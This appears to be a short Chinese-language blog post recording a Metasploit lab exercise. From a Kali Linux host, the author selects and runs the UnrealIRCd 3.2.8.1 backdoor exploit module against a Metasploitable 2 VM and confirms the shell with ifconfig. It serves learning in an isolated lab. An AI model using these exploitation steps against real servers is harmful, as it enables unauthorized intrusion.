Friday, August 21, 2020

利用 msf 工具進行漏洞攻擊

Kali Linux: 192.168.92.128

Metasploitable 2: 192.168.92.129


msf5 > search irc


msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor 

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > info //查看 module 資訊

     Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution

     Module: exploit/unix/irc/unreal_ircd_3281_backdoor

   Platform: Unix

       Arch: cmd

 Privileged: No

    License: Metasploit Framework License (BSD)

       Rank: Excellent

  Disclosed: 2010-06-12

msf5 > options



開始入侵


打 ifconfig

已在 Metasploitable 2: 192.168.92.129


No comments:

Post a Comment

n8n index

 【n8n免費本地端部署】Windows版|程式安裝x指令大補帖  【一鍵安裝 n8n】圖文教學,獲得無限額度自動化工具&限時免費升級企業版功能